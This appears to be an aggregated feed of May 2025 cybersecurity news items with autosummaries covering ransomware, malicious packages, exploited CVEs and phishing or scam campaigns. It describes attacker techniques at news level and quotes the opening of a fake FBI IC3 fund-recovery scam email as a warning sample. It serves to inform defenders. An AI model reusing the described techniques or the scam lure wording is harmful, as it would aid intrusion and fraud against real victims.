    Ransomware operations are using legitimate Kickidler employee monitoring software for reconnaissance, tracking their victims' activity, and harvesting credentials after breaching their networks. [...] "

    Autosummary: [Image: Attack flow (Varonis)] While these attacks targeted enterprise administrators, whose accounts would typically provide the threat actors with privileged credentials after compromise, Varonis believes they may have maintained access to the victims' systems for days and even weeks to collect credentials needed to access off-site cloud backups without being detected. "


    Google links new LostKeys data theft malware to Russian cyberspies

    exploits rusia-ucrania
    2025-05-08 https://www.bleepingcomputer.com/news/security/google-links-new-lostkeys-data-theft-malware-to-russian-cyberspies/
    Since the start of the year, the Russian state-backed ColdRiver hacking group has been using new LostKeys malware to steal files in espionage attacks targeting Western governments, journalists, think tanks, and non-governmental organizations. [...] "

    Autosummary: "


    38,000+ FreeDrain Subdomains Found Exploiting SEO to Steal Crypto Wallet Seed Phrases

    exploits
    2025-05-08 https://thehackernews.com/2025/05/38000-freedrain-subdomains-found.html
    Cybersecurity researchers have exposed what they say is an "industrial-scale, global cryptocurrency phishing operation" engineered to steal digital assets from cryptocurrency wallets for several years. The campaign has been codenamed FreeDrain by threat intelligence firms SentinelOne and Validin. "FreeDrain uses SEO manipulation, free-tier web services (like gitbook.io, webflow.io, and github.io "

    Autosummary: Unsuspecting users who land on these pages are served a static screenshot of the legitimate wallet interface; clicking it triggers one of three behaviors: redirect the user to legitimate websites; redirect the user to other intermediary sites; or direct the user to a lookalike phishing page that prompts them to enter their seed phrase, effectively draining their wallets. "The entire flow is frictionless by design, blending SEO manipulation, familiar visual elements, and platform trust to lull victims into a false sense of legitimacy," the researchers said. "FreeDrain uses SEO manipulation, free-tier web services (like gitbook.io, webflow.io, and github.io), and layered redirection techniques to target cryptocurrency wallets," security researchers Kenneth Kinion, Sreekar Madabushi, and Tom Hegel said in a technical report shared with The Hacker News. "


    Qilin Ransomware Ranked Highest in April 2025 with Over 45 Data Leak Disclosures

    exploits ransomware
    2025-05-08 https://thehackernews.com/2025/05/qilin-leads-april-2025-ransomware-spike.html
    Threat actors with ties to the Qilin ransomware family have leveraged malware known as SmokeLoader along with a previously undocumented .NET compiled loader codenamed NETXLOADER as part of a campaign observed in November 2024. "NETXLOADER is a new .NET-based loader that plays a critical role in cyber attacks," Trend Micro researchers Jacob Santos, Raymart Yambot, John Rainier Navato, Sarah Pearl "

    Autosummary: "Agenda ransomware activity was primarily observed in healthcare, technology, financial services, and telecommunications sectors across the U.S., the Netherlands, Brazil, India, and the Philippines," according to Trend Micro's data from the first quarter of 2025. "


    Pay day banking outages hit 1.2m people, banks reveal

    financial
    2025-05-08 https://www.bbc.com/news/articles/c7875w07l93o
    In letters to MPs, four major banks have set out the extent of the disruption caused in February's outage. "

    Autosummary: Ron van Kemenade, the bank's group chief operating officer, said around 700,000 people who are customers of Lloyds, Halifax, Bank of Scotland and MBNA were affected as they couldn't log into their accounts on a first attempt. "


    Education giant Pearson hit by cyberattack exposing customer data

    ciber
    2025-05-08 https://www.bleepingcomputer.com/news/security/education-giant-pearson-hit-by-cyberattack-exposing-customer-data/
    Education giant Pearson suffered a cyberattack, allowing threat actors to steal corporate data and customer information, BleepingComputer has learned. [...] "

    Autosummary: However, when BleepingComputer asked Pearson about whether they paid a ransom, what they meant by "legacy data," how many customers were impacted, and if customers would be notified, the company responded that they would not be commenting on these questions. "


    Malicious PyPi package hides RAT malware, targets Discord devs since 2022

    exploits
    2025-05-08 https://www.bleepingcomputer.com/news/security/malicious-pypi-package-hides-rat-malware-targets-discord-devs-since-2022/
    A malicious Python package targeting Discord developers with remote access trojan (RAT) malware was spotted on the Python Package Index (PyPI) after more than three years. [...] "

    Autosummary: "


    The LockBit ransomware site was breached, database dump was leaked online

    exploits ransomware
    2025-05-08 https://securityaffairs.com/177619/cyber-crime/the-lockbit-ransomware-site-was-breached-database-dump-was-leaked-online.html
    The LockBit ransomware group has been compromised; attackers stole and leaked data contained in the backend infrastructure of its dark web site. Hackers compromised the dark web leak site of the LockBit ransomware gang and defaced it, posting a message and a link to the dump of the MySQL database of its backend affiliate panel. “Don’t […] "

    Autosummary: (Colombia), .jp (Japan), .br (Brazil), .tw (Taiwan), .ph (Philippines), .fr (France). “Finally, this is a rich source of operational and technical intelligence. "


    Digital welfare fraud: ALTSRUS syndicate exploits the financially vulnerable

    financial exploits
    2025-05-07 https://www.helpnetsecurity.com/2025/05/07/altsrus-digital-welfare-fraud/

    A new report from bot defense firm Kasada has exposed the growing threat of ALTSRUS, a fraud syndicate targeting some of the most vulnerable corners of the digital economy. Researchers revealed how the group has scaled its operations to steal and resell accounts tied to Electronic Benefit Transfer (EBT), pharmacy prescriptions, and consumer rewards programs. Kasada’s threat intelligence team refers to ALTSRUS as the “Reverse Robin Hood” because of its focus on taking from those … More

    The post Digital welfare fraud: ALTSRUS syndicate exploits the financially vulnerable appeared first on Help Net Security.

    "

    Autosummary: "


    Researchers Uncover Malware in Fake Discord PyPI Package Downloaded 11,500+ Times

    exploits
    2025-05-07 https://thehackernews.com/2025/05/researchers-uncover-malware-in-fake.html
    Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that masquerades as a seemingly harmless Discord-related utility but incorporates a remote access trojan. The package in question is discordpydebug, which was uploaded to PyPI on March 21, 2022. It has been downloaded 11,574 times and continues to be available on the open-source registry. "

    Autosummary: In a nutshell, discordpydebug could be used to read sensitive data, such as configuration files, tokens, and credentials, tamper with existing files, download additional payloads, and run commands to exfiltrate data. "


    U.S. CISA adds FreeType flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-05-07 https://securityaffairs.com/177537/hacking/u-s-cisa-adds-freetype-flaw-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds FreeType flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a FreeType flaw, tracked as CVE-2025-27363 (CVSS score of 8.1), to its Known Exploited Vulnerabilities (KEV) catalog. In mid-March, Meta warned that the out-of-bounds write vulnerability CVE-2025-27363 may have been actively exploited in attacks. “An out […]

    Autosummary: Pierluigi Paganini, May 07, 2025.


    TeleMessage, the Signal clone used by US government officials, suffers hack

    government
    2025-05-07 https://www.bitdefender.com/en-us/blog/hotforsecurity/telemessage-signal-clone-us-government-hack
    TeleMessage, an encrypted messaging app based upon Signal, has been temporarily suspended out of "an abundance of caution" after a hacker reportedly gained access to US government communications. Read more in my article on the Hot for Security blog.

    Autosummary: TeleMessage, which is owned by Smarsh, says that it has suspended the app's operation while it investigates the security breach: "Upon detection, we acted quickly to contain it and engaged an external cybersecurity firm to support our investigation," the company said in a statement.


    PoC exploit for SysAid pre-auth RCE released, upgrade quickly!

    exploits
    2025-05-07 https://www.helpnetsecurity.com/2025/05/07/poc-exploit-for-sysaid-pre-auth-rce-released-upgrade-quickly/

    WatchTowr researchers have released a proof-of-concept (PoC) exploit that chains two vulnerabilities in SysAid On-Prem – the self-hosted version of the platform behind SysAid’s popular IT service management and IT helpdesk solutions – to achieve unauthenticated remote code execution on the underlying server. The vulnerabilities have been patched in SysAid On-Prem v24.4.60, released in early March 2025, but it’s likely that many enterprises have not upgraded yet. Creating the PoC “In an on-premise deployment, SysAid … More

    The post PoC exploit for SysAid pre-auth RCE released, upgrade quickly! appeared first on Help Net Security.


    Autosummary: Upgrade and/or prevent access to SysAid instances. If your SysAid instance is internet-facing, you should upgrade it as soon as possible, if not immediately: With a PoC publicly available and SysAid On-Prem having been targeted by ransomware gangs in the past, it’s only a matter of time until exploitation attempts start.


    BlueVoyant introduces Continuous Optimization for Microsoft Security

    ransomware
    2025-05-07 https://www.helpnetsecurity.com/2025/05/07/bluevoyant-continuous-optimization-for-microsoft-security/

    BlueVoyant launched its Continuous Optimization for Microsoft Security (COMS) offering. COMS improves security outcomes, helps customers stay ahead of cyber threats, and minimizes technology costs by drawing on BlueVoyant’s expertise with the Microsoft Security stack. The Microsoft Security suite provides maximum cyber defense when it is properly configured, supplied with threat-responsive detections, and continuously optimized. However, many enterprises struggle to manage these solutions well at scale. BlueVoyant’s Continuous Optimization for Microsoft Security is designed to … More

    The post BlueVoyant introduces Continuous Optimization for Microsoft Security appeared first on Help Net Security.


    Autosummary: Adrian Grigorof, BlueVoyant SVP Microsoft professional services, added, “Enterprises are now seeing the need for technology management, including access to advanced technology, threat intelligence, and expertise.” Threat detection engineering: Access to threat-centric and targeted threat detection analytics, with BlueVoyant’s threat detection engineering team creating custom detection analytics for each enterprise.


    Actively exploited FreeType flaw fixed in Android (CVE-2025-27363)

    exploits
    2025-05-07 https://www.helpnetsecurity.com/2025/05/07/actively-exploited-freetype-flaw-fixed-in-android-cve-2025-27363/

    Google has released fixes for a bucketload of Android security vulnerabilities, including a FreeType flaw (CVE-2025-27363) that “may be under limited, targeted exploitation.” About CVE-2025-27363 CVE-2025-27363 is an out of bounds write vulnerability in FreeType, an open-source software library that renders fonts (thus, text) onto digital displays (e.g., screens) and is used across many platforms, including Android, iOS, macOS, and Linux. FreeType has been the source of multiple security vulnerabilities over the years, mostly due … More

    The post Actively exploited FreeType flaw fixed in Android (CVE-2025-27363) appeared first on Help Net Security.




    Play Ransomware Exploited Windows CVE-2025-29824 as Zero-Day to Breach U.S. Organization

    exploits ransomware
    2025-05-07 https://thehackernews.com/2025/05/play-ransomware-exploited-windows-cve.html
    Threat actors with links to the Play ransomware family exploited a recently patched security flaw in Microsoft Windows as a zero-day as part of an attack targeting an unnamed organization in the United States. The attack, per the Symantec Threat Hunter Team, part of Broadcom, leveraged CVE-2025-29824, a privilege escalation flaw in the Common Log File System (CLFS) driver. It was patched by

    Autosummary: "One of the batch files, called "servtask.bat," is used to escalate privileges, dump the SAM, SYSTEM, and SECURITY Registry hives, create a new user named "LocalSvc," and add it to the Administrator group. The attack is notable for the use of Grixba, a bespoke information stealer previously attributed to Play and an exploit for CVE-2025-29824 that's dropped in the Music folder, giving it names that masquerade as Palo Alto Networks software (e.g., "paloaltoconfig.exe" and "paloaltoconfig.dll")." Other ransomware attacks detected in recent months have leveraged a new Ransomware-as-a-Service (RaaS) known as PlayBoy Locker, which provides relatively unskilled cybercriminals with a comprehensive toolkit comprising ransomware payloads, management dashboards, and support services.


    Unsophisticated cyber actors are targeting the U.S. Energy sector

    industry
    2025-05-07 https://securityaffairs.com/177551/security/unsophisticated-cyber-actors-are-targeting-the-u-s-energy-sector.html
    CISA, FBI, EPA, and DoE warn of cyberattacks on the U.S. Energy sector carried out by unsophisticated cyber actors targeting ICS/SCADA systems. The US cybersecurity agency CISA, the FBI, EPA, and the DoE issued a joint alert to warn of cyberattacks targeting US-based organizations in the oil and natural gas sector. Unsophisticated threat actors are […]



    Play ransomware exploited Windows logging flaw in zero-day attacks

    exploits ransomware
    2025-05-07 https://www.bleepingcomputer.com/news/security/play-ransomware-exploited-windows-logging-flaw-in-zero-day-attacks/
    The Play ransomware gang has exploited a high-severity Windows Common Log File System flaw in zero-day attacks to gain SYSTEM privileges and deploy malware on compromised systems. [...]



    Medical device maker Masimo warns of cyberattack, manufacturing delays

    industry ciber
    2025-05-07 https://www.bleepingcomputer.com/news/security/medical-device-maker-masimo-warns-of-cyberattack-manufacturing-delays/
    Medical device company Masimo Corporation warns that a cyberattack is impacting production operations and causing delays in fulfilling customers' orders. [...]



    CISA warns of hackers targeting critical oil infrastructure

    industry
    2025-05-07 https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-targeting-critical-oil-infrastructure/
    CISA warned critical infrastructure organizations of "unsophisticated" threat actors actively targeting the U.S. oil and natural gas sectors. [...]



    FBI issues warning as scammers target victims of crime

    financial
    2025-05-07 https://www.malwarebytes.com/blog/news/2025/05/fbi-issues-warning-as-scammers-target-victims-of-crime
    The FBI has warned scammers are impersonating the IC3, tricking victims by claiming to be able to recover funds.

    Autosummary: Besides other direct payments, called recovery fees, processing fees, tax clearance, or compliance charges, the scammers will typically try to get hold of: Financial information like credit card details, bank account numbers, cryptocurrency wallet addresses, and private keys. Subject: Recovery of Funds – Immediate Action Required. Date: April 22, 2025. To: [victim’s email address]. “Dear [Full Name], This is to notify you that after a recent audit by the Federal Bureau of Investigation’s Internet Crime Complaint Center (IC3), we have identified your case as eligible for full recovery of lost funds stemming from your previous online fraud complaint (Case ID: #IC3-R2471982-Q2).” Scammers may ask for sensitive data, including Social Security numbers, bank account details, or login credentials.


    OttoKit WordPress Plugin with 100K+ Installs Hit by Exploits Targeting Multiple Flaws

    exploits
    2025-05-07 https://thehackernews.com/2025/05/ottokit-wordpress-plugin-with-100k.html
    A second security flaw impacting the OttoKit (formerly SureTriggers) WordPress plugin has come under active exploitation in the wild. The vulnerability, tracked as CVE-2025-27007 (CVSS score: 9.8), is a privilege escalation bug impacting all versions of the plugin prior to and including version 1.0.82. "This is due to the create_wp_connection() function missing a capability check and



    Canary Exploit tool allows to find servers affected by Apache Parquet flaw

    exploits
    2025-05-07 https://securityaffairs.com/177565/security/canary-exploit-tool-allows-to-find-servers-affected-by-apache-parquet-flaw.html
    F5 Labs researchers released a PoC tool to find servers vulnerable to the Apache Parquet vulnerability CVE-2025-30065. A working proof-of-concept exploit for the critical Apache Parquet vulnerability CVE-2025-30065 has been released by F5 Labs, allowing the identification of vulnerable servers. The tool, called “canary exploit,” is available on the security firm’s GitHub repository. Apache Parquet’s […]

    Autosummary: In April 2025, experts disclosed a critical vulnerability, tracked as CVE-2025-30065 (CVSS score of 10.0), impacting Apache Parquet’s Java Library that could allow remote code execution. “Schema parsing in the parquet-avro module of Apache Parquet 1.15.0 and previous versions allows bad actors to execute arbitrary code,” reads the advisory. “All confidentiality, integrity, and availability of the affected system are at risk (in CVSS terms, “High” impact on all three). Despite the frightening potential, it’s important to note that the vulnerability can only be exploited if a malicious Parquet file is imported.”


    CoGUI phishing platform sent 580 million emails to steal credentials

    financial
    2025-05-07 https://www.bleepingcomputer.com/news/security/cogui-phishing-platform-sent-580-million-emails-to-steal-credentials/
    A new phishing kit named "CoGUI" sent over 580 million emails to targets between January and April 2025, aiming to steal account credentials and payment data. [...]

    Autosummary: The messages impersonate major brands like Amazon, Rakuten, PayPal, Apple, tax agencies, and banks.


    Hackers exploit OttoKit WordPress plugin flaw to add admin accounts

    exploits
    2025-05-07 https://www.bleepingcomputer.com/news/security/hackers-exploit-ottokit-wordpress-plugin-flaw-to-add-admin-accounts/
    Hackers are exploiting a critical unauthenticated privilege escalation vulnerability in the OttoKit WordPress plugin to create rogue admin accounts on targeted sites. [...]



    Play ransomware affiliate leveraged zero-day to deploy malware

    exploits ransomware
    2025-05-07 https://securityaffairs.com/177573/cyber-crime/play-ransomware-affiliate-leveraged-zero-day-to-deploy-malware.html
    The Play ransomware gang exploited a high-severity Windows Common Log File System flaw in zero-day attacks to deploy malware. The Play ransomware gang has exploited a Windows Common Log File System flaw, tracked as CVE-2025-29824, in zero-day attacks to gain SYSTEM privileges and deploy malware on compromised systems. The vulnerability CVE-2025-29824, (CVSS score of 7.8) is a Use after […]

    Autosummary: Pierluigi Paganini, May 07, 2025.


    Beware of phone scams demanding money for ‘missed jury duty’

    financial
    2025-05-07 https://www.welivesecurity.com/en/scams/phone-scams-demanding-money-missed-jury-duty/
    When we get the call, it’s our legal responsibility to attend jury service. But sometimes that call won’t come from the courts – it will be a scammer.

    Autosummary: Always contact the authority in question independently (rather than replying to the email/text). Never divulge sensitive personal and financial information online or over the phone. Remember that scammers can spoof their Caller ID to appear legitimate. Never pay alleged fines by gift cards, crypto or money transfers. If threatened while on the phone, stay calm, ask where the person is calling from, hang up and then call that office to check its legitimacy. Keep up to date with the latest scam tactics from the FTC and other government sites. Use anti-malware on all devices and computers to help filter out phishing messages and emails. What to do if you’ve been scammed: If you realize you’ve been scammed, don’t panic. Work step by step through the following: If you’re on a call, hang up immediately. Make a note of as much information as possible, including the ‘name’ and/or badge number of the scammer, what they said and where they called/emailed from, and payment details. Report the incident to the police and FTC. While they may not be able to help you recover any stolen money, it may help others. Call your bank and freeze your credit/debit cards. Monitor your bank account for any unusual activity. Freeze your credit with the three big credit agencies, so scammers can’t take out credit lines in your name. It can be a daunting task when threatened with jail time and steep fines. Yet scammers will do so, often requesting that funds be transferred by crypto, gift cards, wire transfer or an instant payment app like Zelle, Venmo or Cash App.


    NCSC warns of IT helpdesk impersonation trick being used by ransomware gangs after UK retailers attacked

    exploits ransomware
    2025-05-07 https://www.exponential-e.com/blog/ncsc-warns-of-it-helpdesk-impersonation-trick-being-used-by-ransomware-gangs-after-uk-retailers-attacked
    The UK's National Cyber Security Centre (NCSC) has warned the IT helpdesks of retailers to be on their guard against bogus support calls they might receive from hackers pretending to be staff locked out of their accounts. Read more in my article on the Exponential-e blog.



    Cybersecurity jobs available right now: May 6, 2025

    ciber
    2025-05-06 https://www.helpnetsecurity.com/2025/05/06/cybersecurity-jobs-available-right-now-may-6-2025/

    Application Security Specialist Signify | Netherlands | On-site – View job details As an Application Security Specialist, you will define and deploy the application security strategy for security improvements to be on par with the industry and its benchmarks. Coordinate and perform security and vulnerability assessments, code reviews, pen tests and verifications, and drive remediation. Identify, assess, and manage risks to meet the security needs of the organization. CloudOps – Security TeKnowledge | UAE | … More

    The post Cybersecurity jobs available right now: May 6, 2025 appeared first on Help Net Security.


    Autosummary: Insider Threat Management Analyst Marsh McLennan | Ireland | Hybrid – View job details As an Insider Threat Management Analyst, you will design, build, test, deploy, maintain, troubleshoot, and document the MMC Insider Threat tools, functions, processes, and documentation. IT Security Operations Analyst Oldendorff Carriers | UAE | On-site – View job details As an IT Security Operations Analyst, you will investigate and analyse security events, alerts, and logs, anomalous and misuse activities to identify potential security breaches, determine the root cause, scope of impact, and extent of compromise and take appropriate actions to mitigate them and document findings to support incident response and remediation efforts. Security Developer Metrea | United Kingdom | Hybrid – View job details As a Security Developer, your responsibilities will be focused on cybersecurity analytics development, testing of configuration and configuration management, software security and risk assessment, customized configuration polices, profiles, and system features, and the development of security dashboards and reports. Principal Engineer, Cyber Security SPH Media | Singapore | On-site – View job details As a Principal Engineer, Cyber Security, you will develop, implement, and maintain secure architectures for on-premises, hybrid, and cloud-based environments. Senior Security Engineer Final | Israel | On-site – View job details As a Senior Security Engineer, you will design, deploy, and operate technologies to detect, prevent, and analyze security threats in a diverse and complex environment, encompassing both public cloud and on-premises systems. Offensive Security Team Lead JFrog | Israel | On-site – View job details As an Offensive Security Team Lead, you will lead, plan, design, and execute Red Team operations, threat modeling, and adversarial simulations against JFrog’s infrastructure and cloud environments.


    How cybercriminals exploit psychological triggers in social engineering attacks

    exploits ciber
    2025-05-06 https://www.helpnetsecurity.com/2025/05/06/social-engineering-human-behavior/

    Most attacks don’t start with malware; they begin with a message that seems completely normal, whether it comes through email, a phone call, or a chat, and that is exactly what makes them so effective. These threats rely on psychological manipulation to bypass people, not firewalls. Pressure is applied, authority is faked, and communication is mimicked. Social engineering threats account for most cyberthreats faced by individuals in 2024, according to Avast. Some people are easier … More

    The post How cybercriminals exploit psychological triggers in social engineering attacks appeared first on Help Net Security.


    Autosummary: Mimicking friends, coworkers, trusted emails, websites, or messages makes attempts seem more legitimate, making it harder to recognize when something is a scam. “With a physical intrusion, so many factors come into play—time of day, location, the security in place, and the people trusted to maintain it.”


    Update ASAP: Google Fixes Android Flaw (CVE-2025-27363) Exploited by Attackers

    exploits
    2025-05-06 https://thehackernews.com/2025/05/google-fixes-actively-exploited-android.html
    Google has released its monthly security updates for Android with fixes for 46 security flaws, including one vulnerability that it said has been exploited in the wild. The vulnerability in question is CVE-2025-27363 (CVSS score: 8.1), a high-severity flaw in the System component that could lead to local code execution without requiring any additional execution privileges. "The most severe of



    Critical Langflow Flaw Added to CISA KEV List Amid Ongoing Exploitation Evidence

    exploits
    2025-05-06 https://thehackernews.com/2025/05/critical-langflow-flaw-added-to-cisa.html
    A recently disclosed critical security flaw impacting the open-source Langflow platform has been added to the Known Exploited Vulnerabilities (KEV) catalog by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), citing evidence of active exploitation. The vulnerability, tracked as CVE-2025-3248, carries a CVSS score of 9.8 out of a maximum of 10.0. "Langflow contains a missing



    Smishing on a Massive Scale: ‘Panda Shop’ Chinese Carding Syndicate

    financial
    2025-05-06 https://securityaffairs.com/177502/cyber-crime/smishing-on-a-massive-scale-panda-shop-chinese-carding-syndicate.html
    Resecurity found a new smishing kit called ‘Panda Shop,’ mimicking Smishing Triad tactics with improved features and new templates. Resecurity (USA) was the first company to identify the Smishing Triad, a group of Chinese cybercriminals targeting consumers across the globe. In August 2023, our team was able to identify their activity and locate the smishing […]

    Autosummary: Pierluigi Paganini, May 06, 2025.


    Linux wiper malware hidden in malicious Go modules on GitHub

    exploits Linux
    2025-05-06 https://www.bleepingcomputer.com/news/security/linux-wiper-malware-hidden-in-malicious-go-modules-on-github/
    A supply-chain attack targets Linux servers with disk-wiping malware hidden in Golang modules published on GitHub. [...]



    Exploited: Vulnerability in software for managing Samsung digital displays (CVE-2024-7399)

    exploits
    2025-05-06 https://www.helpnetsecurity.com/2025/05/06/exploited-vulnerability-software-managing-samsung-digital-displays-cve-2024-7399/

    An easily and remotely exploitable vulnerability (CVE-2024-7399) affecting Samsung MagicINFO, a platform for managing content on Samsung commercial displays, is being leveraged by attackers. Exploit attempts have been flagged by the SANS Internet Storm Center and Arctic Wolf researchers: the attackers are using the vulnerability to upload and execute a script that contains a downloader for a Mirai bot. About CVE-2024-7399 Samsung MagicINFO is a digital signage management platform that is used to create, schedule, … More

    The post Exploited: Vulnerability in software for managing Samsung digital displays (CVE-2024-7399) appeared first on Help Net Security.


    Autosummary: Samsung MagicINFO is a digital signage management platform that is used to create, schedule, and manage multimedia content on Samsung commercial displays, which are often used in transportation hubs, retail stores, restaurants, corporate lobbies, healthcare organizations, financial institutions, etc.


    Google fixed actively exploited Android flaw CVE-2025-27363

    exploits
    2025-05-06 https://securityaffairs.com/177514/mobile-2/google-fixed-actively-exploited-android-flaw-cve-2025-27363.html
    Google addressed 46 Android security vulnerabilities, including one issue that has been exploited in attacks in the wild. Google’s monthly security updates for Android addressed 46 flaws, including a high-severity vulnerability, tracked as CVE-2025-27363 (CVSS score of 8.1), that has been exploited in the wild. The company did not disclose any details regarding the attacks […]

    Autosummary: Pierluigi Paganini, May 06, 2025.


    Peru imposes curfew after kidnap and murder of 13 mine workers

    latam
    2025-05-06 https://www.bbc.com/news/articles/c0l033ezg1po
    A local prosecutor says there is a "war" raging in the area between illegal and legal gold miners.

    Autosummary: The miners were killed after being kidnapped by criminal gangs, authorities allege. La Poderosa, the Peruvian company which owns the gold mine at which the men worked, said they had been kidnapped by "illegal miners colluding with criminals" on 26 April.


    UK Legal Aid Agency investigates cybersecurity incident

    ciber
    2025-05-06 https://www.bleepingcomputer.com/news/security/uk-legal-aid-agency-investigates-cybersecurity-incident/
    The Legal Aid Agency (LAA), an executive agency of the UK's Ministry of Justice that oversees billions in legal funding, warned law firms of a security incident and said the attackers might have accessed financial information. [...]

    Autosummary: On Friday, May 1st, Harrods confirmed that it restricted internet access to sites after threat actors also tried to breach its network, suggesting an active response to a cyberattack, although a breach has yet to be confirmed.


    Critical Langflow RCE flaw exploited to hack AI app servers

    exploits
    2025-05-06 https://www.bleepingcomputer.com/news/security/critical-langflow-rce-flaw-exploited-to-hack-ai-app-servers/
    The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has tagged a Langflow remote code execution vulnerability as actively exploited, urging organizations to apply security updates and mitigations as soon as possible. [...]

    Autosummary: The tool, which has nearly 60k stars and 6.3k forks on GitHub, is used by AI developers, researchers, and startups, for prototyping chatbots, data pipelines, agent systems, and AI applications.


    Google fixes actively exploited FreeType flaw on Android

    exploits
    2025-05-06 https://www.bleepingcomputer.com/news/security/google-fixes-actively-exploited-freetype-flaw-on-android/
    Google has released the May 2025 security updates for Android with fixes for 45 security flaws, including an actively exploited zero-click FreeType 2 code execution vulnerability. [...]

    Autosummary: The rest of the flaws fixed by Google this month concern problems in Framework, System, Google Play, and the Android Kernel, as well as security gaps in proprietary components from MediaTek, Qualcomm, Arm, and Imagination Technologies.


    Android fixes 47 vulnerabilities, including one zero-day. Update as soon as you can!

    exploits
    2025-05-06 https://www.malwarebytes.com/blog/news/2025/05/android-fixes-47-vulnerabilities-including-one-zero-day-update-as-soon-as-you-can
    Google has patched 47 Android vulnerabilities in its May update, including an actively exploited FreeType vulnerability.

    Autosummary: For most phones it works like this: Under About phone or About device you can tap on Software updates to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device.


    RCE flaw in tool for building AI agents exploited by attackers (CVE-2025-3248)

    exploits
    2025-05-06 https://www.helpnetsecurity.com/2025/05/06/langflow-cve-2025-3248-exploited/

    A missing authentication vulnerability (CVE-2025-3248) in Langflow, a web application for building AI-driven agents, is being exploited by attackers in the wild, CISA has confirmed by adding it to its Known Exploited Vulnerabilities (KEV) catalog. About CVE-2025-3248 Langflow is an open-source, Python-based app that allows users to create AI agents (e.g., chatbot assistants) and workflows without actually writing any code. Instead, they simply drag, drop and chain LLM components and add the necessary inputs. Unfortunately, … More

    The post RCE flaw in tool for building AI agents exploited by attackers (CVE-2025-3248) appeared first on Help Net Security.




    Hackers Exploit Samsung MagicINFO, GeoVision IoT Flaws to Deploy Mirai Botnet

    exploits industry
    2025-05-06 https://thehackernews.com/2025/05/hackers-exploit-samsung-magicinfo.html
    Threat actors have been observed actively exploiting security flaws in GeoVision end-of-life (EoL) Internet of Things (IoT) devices to corral them into a Mirai botnet for conducting distributed denial-of-service (DDoS) attacks. The activity, first observed by the Akamai Security Intelligence and Response Team (SIRT) in early April 2025, involves the exploitation of two operating system command



    New Investment Scams Use Facebook Ads, RDGA Domains, and IP Checks to Filter Victims

    financial
    2025-05-06 https://thehackernews.com/2025/05/new-investment-scams-use-facebook-ads.html
    Cybersecurity researchers have lifted the lid on two threat actors that orchestrate investment scams through spoofed celebrity endorsements and conceal their activity through traffic distribution systems (TDSes). The activity clusters have been codenamed Reckless Rabbit and Ruthless Rabbit by DNS threat intelligence firm Infoblox. The attacks have been observed to lure victims with bogus

    Autosummary: Reckless Rabbit is said to have been creating domains as far back as April 2024, primarily targeting users in Russia, Romania, and Poland, while excluding traffic from Afghanistan, Somalia, Liberia, Madagascar, and others. Some of these forms, besides requesting users' names, phone numbers, and email addresses, offer the ability to auto-generate a password, a key piece of information that's used to progress to the next phase of the attack -- validation checks. What's more, the ads contain unrelated images and display a decoy domain (e.g., "amazon[.]pl") that's different from the actual domain the user will be redirected to once they click on the link (e.g., "tyxarai[.]org").


    Experts warn of a second wave of attacks targeting SAP NetWeaver bug CVE-2025-31324

    exploits
    2025-05-06 https://securityaffairs.com/177522/hacking/experts-warn-of-a-second-wave-of-attacks-targeting-sap-netweaver-bug-cve-2025-31324.html
    Threat actors launch second wave of attacks on SAP NetWeaver, exploiting webshells from a recent zero-day vulnerability. In April, ReliaQuest researchers warned that a zero-day vulnerability, tracked as CVE-2025-31324 (CVSS score of 10/10), in SAP NetWeaver is potentially being exploited. Thousands of internet-facing applications are potentially at risk. The flaw in SAP NetWeaver Visual Composer Metadata Uploader […]

    Autosummary: Pierluigi Paganini, May 06, 2025.


    U.S. CISA adds Langflow flaw to its Known Exploited Vulnerabilities catalog

    exploits
    2025-05-06 https://securityaffairs.com/177481/hacking/u-s-cisa-adds-langflow-flaw-to-its-known-exploited-vulnerabilities-catalog.html
    U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Langflow flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Langflow flaw, tracked as CVE-2025-3248 (CVSS score of 9.8), to its Known Exploited Vulnerabilities (KEV) catalog. Langflow is a popular tool used for building agentic AI workflows.  CVE-2025-3248 is a […] "

    Autosummary: U.S. CISA adds Langflow flaw to its Known Exploited Vulnerabilities catalog, Pierluigi Paganini, May 06, 2025. U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Langflow flaw to its Known Exploited Vulnerabilities catalog. "


    Apache Parquet exploit tool detect servers vulnerable to critical flaw

    exploits
    2025-05-06 https://www.bleepingcomputer.com/news/security/apache-parquet-exploit-tool-detect-servers-vulnerable-to-critical-flaw/
    A proof-of-concept exploit tool has been publicly released for a maximum severity Apache Parquet vulnerability, tracked as CVE-2025-30065, making it easy to find vulnerable servers. [...] "

    Autosummary: From a technical perspective, CVE-2025-30065 is a deserialization flaw in the parquet-avro module of Apache Parquet Java, where the library fails to restrict which Java classes can be instantiated when reading Avro data embedded in Parquet files. "


    Samsung MagicINFO 9 Server RCE flaw now exploited in attacks

    exploits
    2025-05-06 https://www.bleepingcomputer.com/news/security/samsung-magicinfo-9-server-rce-flaw-now-exploited-in-attacks/
    Hackers are exploiting an unauthenticated remote code execution (RCE) vulnerability in the Samsung MagicINFO 9 Server to hijack devices and deploy malware. [...] "

    Autosummary: "


    Samsung MagicINFO flaw exploited days after PoC exploit publication

    exploits
    2025-05-06 https://securityaffairs.com/177529/hacking/samsung-magicinfo-vulnerability-exploited-after-poc-publication.html
    Threat actors started exploiting a vulnerability in Samsung MagicINFO only days after a PoC exploit was published. Arctic Wolf researchers observed threat actors beginning to exploit a high-severity vulnerability, tracked as CVE-2024-7399 (CVSS score: 8.8), in the Samsung MagicINFO content management system (CMS) just days after proof-of-concept (PoC) exploit code was publicly released. The vulnerability […] "

    Autosummary: "


    Toll road scams are in overdrive: Here’s how to protect yourself

    financial
    2025-05-06 https://www.welivesecurity.com/en/scams/put-brakes-toll-road-scams/
    Have you received a text message about an unpaid road toll? Make sure you’re not the next victim of a smishing scam. "

